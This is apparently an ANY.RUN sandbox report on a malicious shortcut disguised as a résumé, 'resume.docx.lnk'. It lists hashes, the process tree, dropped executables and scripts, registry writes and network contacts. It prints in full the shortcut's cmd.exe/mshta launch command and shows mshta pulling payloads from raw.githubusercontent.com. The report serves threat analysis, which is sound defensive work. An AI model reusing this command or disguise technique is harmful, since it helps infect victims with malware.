| File name: | resume.docx.lnk |
| Full analysis: | https://app.any.run/tasks/eaf4d3ea-6afb-4ac5-9a9f-48c8f284b7aa |
| Verdict: | Malicious activity |
| Analysis date: | December 06, 2024, 11:13:42 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Unicoded, HasEnvironment "%windir%\system32\cmd.exe", MachineID uran, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Thu Jun 13 12:22:21 2024, atime=Fri Nov 29 19:01:05 2024, mtime=Thu Jun 13 12:22:21 2024, length=289792, window=normal, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe" |
| MD5: | 6076EAF95EF25DBC49552FFABB7AF05F |
| SHA1: | 159826D32AE3713C836175FAFC22C30F30C1CE29 |
| SHA256: | 6F3194EACF6A888B7CF60AB43F5BAB1027C0803609183AA13AB3DDD130FD3ECC |
| SSDEEP: | 384:7w1lqQdSh7G+d6obKaYVeTZ4VtNz84JUyIlKGa02HkdCzmIMYK3VhD:SqJEobKXukPz8eUykKGazDMT33 |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | IDList, LinkInfo, CommandArgs, IconFile, Unicode, ExpString, TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2024:06:13 12:22:21+00:00 |
| AccessDate: | 2024:11:29 19:01:05+00:00 |
| ModifyDate: | 2024:06:13 12:22:21+00:00 |
| TargetFileSize: | 289792 |
| IconIndex: | 1 |
| RunWindow: | Normal |
| HotKey: | (none) |
| TargetFileDOSName: | cmd.exe |
| DriveType: | Fixed Disk |
| DriveSerialNumber: | 1ABE-90A2 |
| VolumeLabel: | Windows 10 |
| LocalBasePath: | C:\Windows\System32\cmd.exe |
| CommandLineArguments: | /C "if exist %CD%\resume.docx.lnk (start "" /B "mshta" "%CD%\resume.docx.lnk" & exit 0) else for /f "delims=" %a in ('dir /b /o-d %TEMP%\*.rartemp') do start "" /B "mshta" "%TEMP%\%a\resume.docx.lnk" & exit 0" |
| IconFileName: | %SystemRoot%\System32\SHELL32.dll |
| MachineID: | uran |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2136 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | base.pk | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2220 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2452 | ping -n 3 127.0.0.1 | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2744 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4164 | "C:\Windows\System32\cmd.exe" /c ping -n 3 127.0.0.1>nul | C:\Windows\System32\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5308 | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 16.0.16026.20146 Modules
| |||||||||||||||
| 5464 | "C:\Windows\System32\cmd.exe" /C "if exist %CD%\resume.docx.lnk (start "" /B "mshta" "%CD%\resume.docx.lnk" & exit 0) else for /f "delims=" %a in ('dir /b /o-d C:\Users\admin\AppData\Local\Temp\*.rartemp') do start "" /B "mshta" "C:\Users\admin\AppData\Local\Temp\%a\resume.docx.lnk" & exit 0" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5780 | "mshta" "C:\Users\admin\AppData\Local\Temp\resume.docx.lnk" | C:\Windows\System32\mshta.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5992 | base.pk | C:\Users\admin\AppData\Local\Temp\base.pk | — | Word.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 1 Modules
| |||||||||||||||
| 6372 | "C:\Users\admin\AppData\Local\Temp\Word.exe" | C:\Users\admin\AppData\Local\Temp\Word.exe | — | mshta.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Modules
| |||||||||||||||
| (PID) Process: | (5780) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (5780) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (5780) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | de-de |
Value: 1 | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | es-es |
Value: 1 | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | fr-fr |
Value: 1 | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | it-it |
Value: 1 | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ja-jp |
Value: 1 | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ko-kr |
Value: 1 | |||
| (PID) Process: | (5308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | pt-br |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5780 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\resume[1].doc | executable | |
MD5:10233969EF917B123B0249EF8FE64536 | SHA256:B0CDF21D7F402C86A7F87BEAA896AD967B3453D2A28215C31BA655445A40ABB8 | |||
| 5308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres | binary | |
MD5:C58660CE5AE55CBBDF61E8922E975276 | SHA256:D78C71C2A2B63413623CE72FCE25897AE95D6E68E05051578FF338C0EBBDA162 | |||
| 6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\gpmsc_externalDBMSleanup.bat | text | |
MD5:C5148520A262094D3CF9155A4F6C6B51 | SHA256:AE674F232BF01C2FC7D1FDD88BDF3136261BB8B9733D7D2047981909A6913F9F | |||
| 6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\58C2.tmp | executable | |
MD5:3964CB1289BD1D131EF2E000617D45A2 | SHA256:0449B5AB5219D807C35634FE263DDE16C6AEA73633378A08553CBF09E977244A | |||
| 5780 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419 | binary | |
MD5:513D3B1339DA0BF0F3C0DE494972A037 | SHA256:60DD835F92BB14F2F281EC94AFAA84454C16FCEB1B002FAE2AB17672AC8881F3 | |||
| 6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\fne5ECF.tmp | binary | |
MD5:C41358C0844D2BCA1CBA7C782BDB02A2 | SHA256:DCCE213AB6543D8C283D77B4A526F6FF9A065F97BBB9F2007A4319034F78A1CC | |||
| 5780 | mshta.exe | C:\Users\admin\AppData\Local\Temp\base.pk | executable | |
MD5:EC2B6BBFA9407C34E0D4B6B34AE1201C | SHA256:C76EA6A3FB5616BA106706E75B27F2CCAB62B3F6CA027DF1B5CD85A9D0448C33 | |||
| 6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\ahh58D2.tmp.vbs | text | |
MD5:0A1C237316E11EC81B1DF21773710C40 | SHA256:1CF290B40445860679BE3BED68C03A0E555C7A3FA91ABA8C216A34CC345A4DBE | |||
| 6716 | cmd.exe | C:\Users\admin\AppData\Local\Temp\secuserpol25086.cfg | ini | |
MD5:5CAEE3B83983062E18D4DBAE58D9946D | SHA256:DB3DE11D4266F67ECF154F0380FA8B4020D6CDDC403F9307739BA47AE4C1C375 | |||
| 5780 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\base[1].pk | executable | |
MD5:EC2B6BBFA9407C34E0D4B6B34AE1201C | SHA256:C76EA6A3FB5616BA106706E75B27F2CCAB62B3F6CA027DF1B5CD85A9D0448C33 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5308 | WINWORD.EXE | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | whitelisted |
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6212 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl | unknown | — | — | whitelisted |
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl | unknown | — | — | whitelisted |
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | — | — | whitelisted |
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
5308 | WINWORD.EXE | GET | — | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | svchost.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
5496 | svchost.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 104.76.201.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5496 | svchost.exe | 104.76.201.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 2.20.142.155:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5780 | mshta.exe | 185.199.108.133:443 | raw.githubusercontent.com | FASTLY | US | shared |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
raw.githubusercontent.com |
| shared |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
officeclient.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub |
Process | Message |
|---|---|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|